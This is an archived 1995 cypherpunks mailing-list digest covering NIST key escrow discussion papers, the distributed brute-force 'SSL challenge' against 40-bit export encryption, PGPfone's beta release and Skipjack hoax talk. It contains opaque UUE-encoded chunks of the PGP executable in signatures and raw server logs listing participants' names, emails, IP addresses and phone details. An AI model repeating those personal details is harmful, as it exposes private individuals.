(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.

Note:  These issues will be discussed at the Key Escrow Issues Meeting
to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at the National
Institute of Standards and Technology (Gaithersburg, Maryland).  The
meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail: carlton@micf.nist.gov.

8/25/95
___________________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 25 Aug 95 10:43:13 PDT
To: cme@TIS.COM
Subject: Re: A 12 Crime w/in & Crime w/out--Ehlers Remark From Carl Ellison
Message-ID: <9508251739.AA17852@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


http://aspen.pff.org/forums/read-message.cgi/forum4?number=n0058010101&by=Date&start=0

> Re: A 12 Crime w/in & Crime w/out--Ehlers Remark
> 
> Carl Ellison (cme@tis.com)
> Fri Aug 25 17:35:42 1995 (GMT)
> 
> -------------------------------------------------------------------------------
> As I believe Congressman Ehlers pointed out, there is crime in cyberspace and
> it is likely to remain a threat forever.
> 
> I refer here to incidents like the Russian hacker's theft of $400,000.
> 
> I do not refer to the use of cyberspace to violate some local ordinance in the
> physical world (the prosecution of the California AA BBS based on the local
> standards in some Eastern state (Tenn?)).
> 
> My company is in the business of protecting people from attacks within
> cyberspace and I believe, personally, that as long as cryptographic policy is
> made rational, we citizens and businesses can mount an effective defense
> against these threats. This is not an issue of using deadly force in defense.
> Because we don't threaten the attacker in return, there is no need for a
> specially empowered force (a police force) controlled by an elected government
> to achieve this protection. This is an issue of building good walls and doors
> -- a strictly defensive action which is appropriate for individuals and
> companies to do without government involvement.
> 
> -------------------------------------------------------------------------------

-- 
Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme/home.html
Trusted Information Systems, Inc.   http://www.tis.com/
3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2
Glenwood MD  21738            Tel:(301)854-6889      FAX:(301)854-5363






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 25 Aug 95 11:49:46 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: Florida Drivers Permits
Message-ID: <199508251855.NAA14828@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:10 PM 8/25/95 -0400, you wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>- -----BEGIN PGP SIGNED MESSAGE-----
>
>[Welcome back, Professor] You posted:
>
>
>>Will, starting next year, containg a digitized photo, plus the current 
>>info.
>
><snip>
>
>>Anyone know any details about the technololgy?
>
><snip>
>
>Not really.
>        I saw the same story. The name, address, age, & height mentioned
>are already obvious on licenses, but this may preclude incorrect data entry
>by FL cops, and counterfeiting (a problem here for *years*). I saw nothing
>on the digitized photo, but we could be looking at different stories.
>Phase-in in July, '96. The story I saw suggests that other data, such as
>tickets, criminal violations (presumably convictions) and "other
>biographical information" [welfare, credit info] could eventually be
>included, depending on FL's state budgetary considerations. No author,
>just "Associated Press," listed on the story, and the card uses a magnetic
>strip "like those on credit cards" rather than a chip, which may be a
>mistake [considering the renewal period & my experience with bank-cards].
>Story doesn't say it, but it sounds like FL *may* be the first state to do
>this. Are any other states doing this already?

Texas is now issuing similar cards - with the addition of a barcode on the
back. Front is going to have UV-reactive writing, and be color-coded for
class of license (commercial, chauffer, etc).

Happily, I renewed just a couple months ago, so have plenty of time to
figure out what I can do to the new DL when I get one :-)

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 25 Aug 95 11:53:20 PDT
To: cypherpunks@toad.com
Subject: brutessl web keyservice
Message-ID: <199508251859.NAA14905@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Feh.

I've been trying to get allocated some more keyspace from the brutessl web
page, and keep getting timeouts.

Last time, I requested 8 segments, got issued *3*.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 25 Aug 95 11:13:45 PDT
To: cypherpunks@toad.com
Subject: NIST Key Escrow Issues Meeting
Message-ID: <9508251808.AA21373@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


I don't know if it's been posted, but I have in my hands a statement
that these meetings will be open to the public.

"The meeting will be open to the public, although seating is limited.
Advance registration is requested, please contact Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail: carlton@micf.nist.gov "

 - Carl

P.S.  Anyone going to CRYPTO95?  I'll be there starting tomorrow (Sat).




 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 25 Aug 95 12:18:23 PDT
To: cypherpunks@toad.com
Subject: ssl challenge
Message-ID: <199508251929.OAA15415@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

It would be Really Nice if the next version of the brutessl software had a
couple of features (particularly for us folks with mini-LANs) -

        > option to output results to a file (or files, so we can maintain
local logging of results: ie, CHAL2a.dat, CHAL2b.dat, etc).
        > a Windows 3.1 variant (or even win32s)

I've got 3 machines (386sx-33, 386DX-20, 486DX2-80), with an option on my
roommates machine (386DX-40), all connected via Windows for Workgroups. All
4 are set up with win32s, so could do a *lot* better at keysearches if the
software was available. There's plenty of support for Unix variants, and
even NT/95, but us humble Win/DOS users are kinda left hanging a bit.

Maybe next challenge, we can pre-allocate keyspace based on the results of
this one: look at how fast folks are reporting results, and allocate chunks
of space accordingly (maybe based on an 8-hour 'cycle'). Sure take some of
the load off the poor server :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD4E48VrTvyYOzAZAQGSMwP8DWxgb5NVDgvIFuw1BGf0E5TP0swHdyZ1
I4gfIGMtjd1AbtJHbxwILSPwb8+BcqZxZtGQXnYRnyoAkK7FltsiGulWApMXmNUU
gtSUMr9xngW+Mwq5ju865Ff5wp7s8Bv3BBTqKGLmXWON1ILbEbjUNwqs4i8+wQU0
PCOgvJndj5M=
=dyvQ
-----END PGP SIGNATURE-----
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Howard Melman <melman@osf.org>
Date: Fri, 25 Aug 95 11:25:59 PDT
To: cypherpunks@toad.com
Subject: Forwarded: FSTC Electronic Check Project News Release
Message-ID: <9508251825.AA08000@absolut.osf.org.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



MAJOR BANKING-COMPUTER CONSORTIUM
TO DEVELOP ELECTRONIC CHECK
FSTC Promises Early Demonstration Using the Internet

Media contacts: Mayer Resnick (201) 836-2968, FSTC, Ed Russell (617)
434-6883, Bank of Boston, FSTC URL: http://www.llnl.gov/fstc

New York (Aug. XX, 1995) -- The Financial Services Technology Consortium
(FSTC) today announced the formation of a multi-industry team to design and
implement an lectronic check for use over the Internet by consumers and
businesses.
 FSTC is a consortium whose goal is to utilize emerging technologies to
enhance the competitiveness of the financial services industry.
 The FSTC Electronic Check, which will work within the existing banking
infrastructure, brings the benefits of paper checks to electronic commerce,
while permitting the increased efficiency and timeliness of doing business
on the "net."  FSTC expects to demonstrate the Electronic Check within the
next two months.
 "This project is particularly significant because it represents the first
collaborative effort by major banks and their industry partners to develop
from inception a new financial standard," said Dan Schutzer, FSTC president
and Citibank vice president and director of advanced technology.
 "FSTC's Electronic Check is designed to be open, secure and convenient.
It will bring to electronic commerce on the Internet a level of security
and confidence currently found only in traditional banking products,"
Schutzer added.
 Bank members of the FSTC Electronic Check program are: Bank of America,
Bank of Boston, Bank of Montreal, Bank One, Chemical Bank, Citibank, and
Wells Fargo Bank.  Industry members are: BBN Inc. (Bolt Beranek & Newman),
Equifax, IBM Corporation, Information Resources Engineering Inc., National
Semiconductor, Sun Microsystems and Telequip. Research and consulting
organizations are: Bellcore, Oak Ridge and Sandia National Laboratories,
and the University of Southern California-Information Sciences Institute.
 Advisory members are:  Electronic Check Clearing House Organization
(ECCHO) and National Automated Clearing House Association (NACHA).
 Appointed as the FSTC Electronic Check project director is John Doggett,
director of applied technology, and as project manager is Frank Jaffe,
senior systems consultant, both from Bank of Boston.
 "As shown by the over 60 billion checks written annually, paper checks are
the payment mechanism of choice.  We expect the FSTC Electronic Check and
its smart-card or PC-card checkbook to become the preferred method for
making and receiving payments due to its cost-effectiveness and embedded
safety features," Doggett said.  "The vision of a bank in your pocket, a
bank at your desk, a bank where your are, can now be achieved with the FSTC
electronic check," Doggett added.
 Formed in September 1993, FSTC is a consortium of some 65 organizations
comprising banks, financial services firms, industry partners, national
laboratories, universities, and government agencies.  FSTC sponsors
collaborative research and development on technical projects affecting the
entire financial services industry and its users with particular emphasis
on projects involving electronic commerce.  FSTC development projects
include interbank check image exchange, electronic commerce, and fraud
detection and management.
Editor's note:  Attached is a brief description of how the FSTC Electronic
Check works.

A Brief Description of How FSTC Electronic Check Works

 The FSTC Electronic Check will provide an enhanced all-electronic
replacement to the current paper check, and will be useable over any
network.
 Paper checks and checkbooks will be replaced by electronic checkbooks,
handwritten signatures will be replaced by digital signatures and the
delivery by the postal service by the Internet or other electronic highway.
 These changes will greatly increase the convenience and security of check
writing since the entire process will be automated and integrated into
existing applications.
 By using "smart cards" and PC cards as electronic checkbooks the FSTC
Electronic Check will be almost impossible to forge.  Unlike paper checks,
the person accepting an FSTC Electronic Check for payment will be able to
verify that it has not been altered.
 As with paper checks, electronic checks will be an open payment
instrument, providing for third-party services and a variety of payment
options, such as travelers', cashiers' and certified checks.  FSTC
Electronic Checks also integrate into existing interbank clearing networks
such as the Federal Reserve System and various automated clearing houses.
 FSTC's unique approach to the Electronic Check results in a secure,
self-authenticating payment instrument that bridges the barrier between the
insecure public network and the trusted financial clearing systems.
# # #
For further information on how FSTC and how FSTC Electronic Check works,
please contact: Mayer Resnick (201) 836-2968, FSTC, or Ed Russell (617)
434-6883, Bank of Boston.
# # #




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mlm@skyrr.is (Magnus Logi Magnusson)
Date: Fri, 25 Aug 95 07:53:51 PDT
To: trei@process.com
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <9508251423.AA15417@toad.com>
Message-ID: <199508251452.AA125582364@hp001c.skyrr.is>
MIME-Version: 1.0
Content-Type: text


> Well, the server appears to be unable to serve cgi scripts - I get 
> '500 - server error' whenever I try. I cannot report the ~500 segments
> I swept overnight, nor get new keyspace.
> 
But what also is realy anoying, when I get through I only get 3 keyspaces,
even though I request 16.  I can understand the limit probably caused
by the guy yesterday who requested 50000 keyspaces 1f-something to
ce-something, but I think 3 is way to low.

> I thing it's gotten to the point where the server is the bottleneck on 
> this operation - we seem to have plenty of cpu for sweeps. This will
> damage our primary goal - to demonstrate how fast 40 bits can be
> swept.
> 
I and a coworker have 4 pentiums (not much compared to some of you) but they
are idleing most of the time...

> Piete, Adam, could you put a note on the /bute/ root page describing the
> server status?
Yeah.. whats up?

  Logi.

-- 
Magnus Logi Magnusson
System programmer, State and Municipal Data processing center, Iceland
E-mail: mlm@skyrr.is & mlm@rhi.hi.is




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Poppler <lwp@mail.msen.com>
Date: Fri, 25 Aug 95 12:26:35 PDT
To: cypherpunks@toad.com
Subject: SOLVED: Re: for perl experts: brclient problem
In-Reply-To: <Pine.BSD/.3.91.950825132719.4736B-100000@conch.aa.msen.com>
Message-ID: <Pine.BSD/.3.91.950825152308.19832A-100000@conch.aa.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


This no longer fails in brclient 0.17.
(Of course I still get only timouts, but at least it tries)

On Fri, 25 Aug 1995, Lou Poppler wrote:
> I just upgraded to brclient version 0.16.
> I tried to use it with this command:
> brclient -Ltssl -a'2977 6284 390a 3 no'
> I got this result:
> Use of uninitialized variable at ./brclient line 457, <COMMAND> line 1.
> Failed: 0 <No DATA>

::::::::::::::::::::::::::::::::::::::
:: Lou Poppler  <lwp@mail.msen.com> ::   No animals were harmed in the
::      http://www.msen.com/~lwp/   ::   production of this message.
::::::::::::::::::::::::::::::::::::::




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 25 Aug 95 13:20:47 PDT
To: dawagner@tucson.princeton.edu (David A. Wagner)
Subject: Re: Cryptanalysis of S-1
In-Reply-To: <41l6u3$852@cnn.Princeton.EDU>
Message-ID: <9508252019.AA25288@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



OK lets turn this on its head, I think we now have a good idea of how to build a 
cipher in clean room conditions such that nobody is aware of the full details of 
the algorithm.

Team 1: Develop an encryption network, implement as hardware

Team 2: Test various combinations of keyspace.features without being exposed to
	inner workings of the cipher.

Develop your Clipper chip this way and nobody can reveal the source. Fun huh?


I think we are about to see a cascade of Skipjack hoaxes regardless of the 
provenance of the original. Now people have the idea the clueless newbies will 
try.

I'm suprised nobody has tried before, I thought of constructing a Skipjack hoax 
based on DES but with larger S boxes. S1 could be made to run very fast, a 
straight through pipeline would be very nice in hardware. Anyone care to suggest 
how a secure cipher might be based on it (ie appart form the clearly bogus key 
schedule)?

I think a score sheet is in order, marks out of 5 for what? Distribution, 
technical ingenuity, credibility, annoying Dorothy, hardware suitability, 
software suitability... ?

Perhaps the NSA might volunteer to serve the page with the cumulative judgments.

		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 08:26:10 PDT
To: trei@process.com
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <9508251423.AA15417@toad.com>
Message-ID: <"swan.cl.cam.:051560:950825152412"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> Well, the server appears to be unable to serve cgi scripts - I get 
> '500 - server error' whenever I try. I cannot report the ~500 segments
> I swept overnight, nor get new keyspace.

Try again ...

> I thing it's gotten to the point where the server is the bottleneck on 
> this operation

Has been on & off for some time :-((

> - we seem to have plenty of cpu for sweeps. This will damage our primary
> goal - to demonstrate how fast 40 bits can be swept.

Well, my tertiary goal ...

> Piete, Adam, could you put a note on the /bute/ root page describing the
> server status?

Done.

In brief -- you guessed it -- upgrade to http://www.brute.cl.cam.ac.uk/ftp/pub/
brute/brclient 0.16 and ACK should go a lot quicker, and as people move over 
to using 0.16, so will allocates ...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeffrey I. Schiller <jis@mit.edu>
Date: Fri, 25 Aug 95 13:27:39 PDT
To: cypherpunks@toad.com
Subject: PGPfone (BETA TEST) is released
Message-ID: <9508252027.AA23240@big-screw>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

MIT is pleased  to announce that it is   now distributing the BETA  TEST
release of PGPfone.

"PGPfone  (Pretty Good Privacy Phone) is   a software package that turns
your desktop  or notebook computer  into  a  secure telephone.  It  uses
speech  compression and strong cryptography  protocols  to give you  the
ability to have a real-time secure telephone conversation."

The  Beta Test  is only  currently available  for people  with Macintosh
computers. A Windows 95 version is also in the works.

We are distributing PGPfone in the U.S. and Canada via anonymous FTP and
via the World Wide Web.

Anonymous FTP  users   should get  the  file  "/pub/PGPfone/README" from
net-dist.mit.edu. It provides instructions on how to download PGPfone.

Web Users should go to the PGPfone Home Page at:

                   http://web.mit.edu/network/pgpfone

                                -Jeff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMD4xcMUtR20Nv5BtAQGUqwQAmaOxhnbTyqdC5RicIEmiad8UbzdeJEXZ
vfdzCZl4qm94JlohYAby/hDIFqo6cPW504o7CSoWPiEGDi7AYMEX0tq3wdAIdklR
2d/AqW45YWtPrfSdLjF8+xwI41kp/lYSqF9V9ZXycguENjdhd8bnI89tT3Ah20JF
kL4q193/2O8=
=9pv/
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Banisar" <banisar@epic.org>
Date: Fri, 25 Aug 95 13:37:27 PDT
To: "Cypherpunks List" <cypherpunks@toad.com>
Subject: NIST Key Escrow Papers
Message-ID: <n1402753899.59250@epic.org>
MIME-Version: 1.0
Content-Type: text/plain


fyi...

----

August 25, 1995

MEMORANDUM FOR Registrants for the Sept. 6-7, 1995
               Key Escrow Issues Meeting

From:  NIST - Ed Roback

Subject:  Discussion Papers

Attached for your information are two discussion papers for the
upcoming September 6-7, 1995 Key Escrow Issues Meeting to be held
at NIST.  If you have any questions on this material, you may
reach me on 301-975-3696.  

I look forward to seeing you in September.  

Attachments
                    ------------------------

Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #1


                      Issues -- Export of 
                 Software Key Escrowed Encryption


On August 17, 1995, the Administration announced its proposal to
permit the ready export of software encryption provided that the
products use algorithms with key space that does not exceed 64
bits and the key(s) required to decrypt messages/files are
escrowed with approved escrow agents.  Under the proposal,
products will be reviewed to verify that they satisfy the
criteria and, if so, they will be transferred to the Commodity
Control List administered by the Department of Commerce where the
products can be exported under a general license (in much the
same way that 40-bit RC2/RC4 encryption is licensed today).  

We are working toward creating broadly stated criteria that are
in the nature of performance specifications.  To meet these
criteria, encryption products will need to implement key escrow
mechanisms that cannot be readily altered or bypassed so as to
defeat the purposes of key escrowing.  

The criteria, when finalized and published, will state the
objectives, but not the exact technical method(s), by which those
objectives are satisfied.  This is to provide software publishers
the flexibility to design methods for meeting our stated
objectives in a manner that is compatible with the design of
their products.  There are, therefore, a number of questions we
must work together to answer in order to draft effective
criteria.  These questions are:  

*    Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm? 

*    Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?

*    Access to escrow information -- What mechanisms must be
     designed into encryption products to allow authorized access
     to escrowed keys?  This likely includes the identity of the
     key escrow agent(s) and a serial number for the key escrow
     agent to use to identify the key(s)/component(s) necessary
     to decrypt the message.  What other information will be
     necessary to be provided to the escrow agent to identify the
     necessary key(s)/component(s)?  Are there other comparable
     viable approaches?

*    Non-escrowed use -- How can products be made so that they do
     not function with non-escrowed products (or tampered
     escrowed products)?  How can this be tested?

*    Limiting surveillance -- How can products be designed so
     that information both sent and received by the user can be
     decrypted without release of keys of other users?

*    Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?

*    Assurance that keys are escrowed -- How can it be assured
     that key escrow products are indeed satisfactorily escrowed? 
     For example, products could be required to be escrowed at
     time of manufacture or be made inoperable until properly
     escrowed.

*    Ability to re-escrow keys -- How can products be designed so
     that new keys can be escrowed at the user's discretion with
     a U.S. Government approved escrow agent?

*    Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent? 

                         --------------

With your input, we are hopeful that this effort will lead to
definitive criteria, which will facilitate the development of
exportable products and help minimize the time required to obtain
export licenses.  The Administration seeks to finalize such
criteria and make formal conforming modifications to the export
regulations before the end of 1995.  


Note:  These issues will be discussed at the Key Escrow Issues
Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
the National Institute of Standards and Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although
seating is limited.  Advance registration is requested, please
contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
mail: carlton@micf.nist.gov.


8/25/94

                  -----------------------------
Key Escrow Issues Meeting, September 6-7, 1995
Discussion Paper #2


                      Discussion Issues:  
         Desirable Characteristics for Key Escrow Agents


In the government's recent announcement of its intent to allow
the export of 64-bit software key escrow encryption products, one
stipulation was that the keys would be escrowed with an approved
key escrow agent.(*1)  Exactly what qualifications/considerations
are appropriate for approval as a key escrow agent have not been
defined.  Some of the issues which need to be discussed and
resolved include the following:

*    What kinds of organizations should be excluded from
     consideration as approved key escrow agents? 

*    What sort of legal agreement between the government and the
     key escrow agent is necessary to stipulate the
     responsibilities of the agent?  Should this include the
     terms and conditions under which release of a key is
     required?  

*    How will liability for unauthorized release of key be
     handled?

*    Should, for example, intentionally misreleasing or
     destroying a key be criminalized?  Should this include other
     actions?                           

*    How can the government's needs for confidentiality of key
     release be handled?

*    Should approval of key escrow agents be tied to a public key
     infrastructure (for digital signatures and other purposes)? 

*    What procedures need to be developed for the storage and
     safeguarding of keys?

*    What are the acceptable performance criteria (e.g., around-
     the-clock availability, accessibility, reliability, etc.)
     for approved key escrow agents?

*    Under what circumstances will key escrow agents in foreign
     countries be approved?

*    What process will be used to approve escrow agents? 
     Costs/who pays?
---------
(*1)  "Approved," for the purposes of this discussion, means that
the government (or its agent) has formally granted permission for
an organization to hold keys for exportable encryption products.


Note:  These issues will be discussed at the Key Escrow Issues Meeting to be
held September 6-7,
1995 (9:00 a.m. - 5:00 p.m.) at the National Institute of Standards and
Technology (Gaithersburg,
Maryland).  The meeting will be open to the public, although seating is
limited.  Advance registration
is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784
or e-mail:
carlton@micf.nist.gov.

8/25/95



_________________________________________________________________________
Subject: NIST Key Escrow Papers
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Fri, 25 Aug 95 09:01:31 PDT
To: mlm@skyrr.is (Magnus Logi Magnusson)
Subject: Re: SSL Challenge: Are we in trouble?
In-Reply-To: <199508251452.AA125582364@hp001c.skyrr.is>
Message-ID: <"swan.cl.cam.:068530:950825160033"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> But what also is realy anoying, when I get through I only get 3 keyspaces,
> even though I request 16.

Sorry about that -- someone misconfigured their system and walked through the 
address sspaxce asking for ranges (size 3) and then discarding them and asking 
for more.
I wasn't really expecting such small holes, so kept the allocation code REAL 
SIMPLE -- it give the user *upto* the requested amount from the first chunk.
I see this is a bit of a bummer for you :-((
I may tweak it to look in subsequent blocks ....

>> Piete, Adam, could you put a note on the /bute/ root page describing the
>> server status?
> Yeah.. whats up?

As I said earlier, phase (1) and (2) are upsetting phase (3) ...

Basically the WWW interface was calling the SKSP interface and wedging.
WWW then used up all its permitted processes, so the WWW server died.

[[ PERL gurus out there: how can I avoid the "sh -c" process in
	$out = `cmd -a 'arg 1'`;
]]

I have freed the ACK blockage, and made the allocate code not try quite so 
hard, and now our WWW server is back in the land of the living.


The SKSP server is still seeing null sessions which time out after half a 
minute -- a bit of a bummeer :-(

The hosts concerned are decent citizens most of the time (I think ...)
"|23" means "23 seconds after the call started". Any ideas ?

5/08/25 13:59:07 12992 18.43.0.244 {0,0} |11 HELO 1 bal@mit.edu Brian A. 
LaMacchia,NE43-431,3-0290,868-8042 ++ TIMEOUT ||31
95/08/25 13:59:38 12992 198.68.45.155 {0,0} ++ TIMEOUT ||31
95/08/25 14:01:48 12992 192.232.101.8 {0,0} |1 HELO 1 rgvb@alewife.kodak.com 
Richard G. von Blucher with ROC UID, GID |2 COMM brc0.14 [dlkt]: brloop0.2 |8 
INFO ++ TIMEOUT ||31
95/08/25 14:02:19 12992 128.93.8.103 {0,0} ++ TIMEOUT ||31
95/08/25 14:03:06 12992 198.68.45.155 {0,0} ++ TIMEOUT ||31
95/08/25 14:03:50 12992 128.52.36.30 {0,0} |1 HELO 1 lethin@ai.mit.edu Rich 
Lethin ++ TIMEOUT ||31
95/08/25 14:05:29 12992 134.95.80.15 {0,0} ++ TIMEOUT ||31
95/08/25 14:06:13 12992 192.232.101.8 {0,0} |1 HELO 1 rgvb@alewife.kodak.com 
Richard G. von Blucher with ROC UID, GID |6 COMM brc0.14 [dlkt]: brloop0.2 |6 
INFO |17 WORK 2977 |29 KEYS 2977 1 ==> 2977 51a8 3 ++ TIMEOUT ||32
95/08/25 14:06:55 12992 198.68.45.155 {0,0} |0 HELO 1 jcastle@in-system.com 
Jim Castleberry ++ TIMEOUT ||31
95/08/25 14:07:32 12992 204.249.46.33 {0,0} ++ TIMEOUT ||31
95/08/25 14:12:48 12992 163.173.128.233 {0,0} ++ TIMEOUT ||31
95/08/25 14:14:05 12992 204.5.88.180 {0,0} |15 HELO 1 Duncan@hasp.com Duncan J 
Watson |15 COMM brc0.14 [dLkt]: brl0.04 |18 INFO |26 WORK 29de ++ TIMEOUT ||31
95/08/25 14:15:23 12992 129.69.116.124 {0,1} |0 HELO 1 
floeff@mathematik.uni-stuttgart.de Siegfried Loeffler |0 COMM brc0.14 [dlLkt]: 
brl0.04 |0 INFO ++ TIMEOUT ||31
95/08/25 14:16:30 12992 204.215.255.3 {0,0} ++ TIMEOUT ||31
95/08/25 14:17:33 12992 128.93.8.7 {0,0} |1 HELO 1 damien.doligez@inria.fr 
Damien Doligez |1 COMM brc0.14 [dlLkt]: brl0.04 ++ TIMEOUT ||31
95/08/25 14:21:12 12992 18.43.0.111 {0,0} ++ TIMEOUT ||31
95/08/25 14:31:35 12992 128.52.36.32 {0,1} |11 HELO 1 
lethin@almond-fr.ai.mit.edu Rich Lethin ++ TIMEOUT ||31
95/08/25 14:33:51 12992 193.197.24.49 {0,0} |9 HELO 1 cg@bofh.lake.de Cees de 
Groot ++ TIMEOUT ||31
95/08/25 14:34:27 12992 202.30.52.1 {0,0} |2 HELO 1 jschoi@seodu.co.kr Choi 
Jaeseon |18 COMM brc0.08: brloop0.2 ++ TIMEOUT ||31
95/08/25 14:35:05 12992 18.151.0.165 {0,0} |13 HELO 1 zeno@madman.MIT.EDU 
Richard Duffy ++ TIMEOUT ||31
95/08/25 14:36:28 12992 155.100.229.31 {0,0} ++ TIMEOUT ||32
95/08/25 14:38:02 12992 128.93.8.81 {0,0} |0 HELO 1 damien.doligez@inria.fr 
Damien Doligez ++ TIMEOUT ||31
95/08/25 14:38:33 12992 155.100.229.31 {0,0} |0 HELO 1 
zinc@zifi.genetics.utah.edu zinc,over there,666-HATE,666-LOVE, ++ TIMEOUT ||32
95/08/25 14:39:12 12992 129.13.109.39 {1,0} |0 HELO 1 an121660@anon.penet.fi 
Olaf Erb,,, |1 COMM brc0.14 [dlLkt]: brl0.03 |3 INFO |15 WORK 2977 ++ TIMEOUT 
||31
95/08/25 14:40:40 12992 198.82.200.50 {0,0} |13 HELO 1 
millner@millner.bevc.blacksburg.va.us Robert Millner,,,(540)961-4321, ++ 
TIMEOUT ||31
95/08/25 14:41:24 12992 18.43.0.163 {0,0} |0 HELO 1 bal@mit.edu Brian A. 
LaMacchia,NE43-431,3-0290,868-8042 |14 COMM brc0.12: brl0.04 |23 INFO ++ 
TIMEOUT ||31
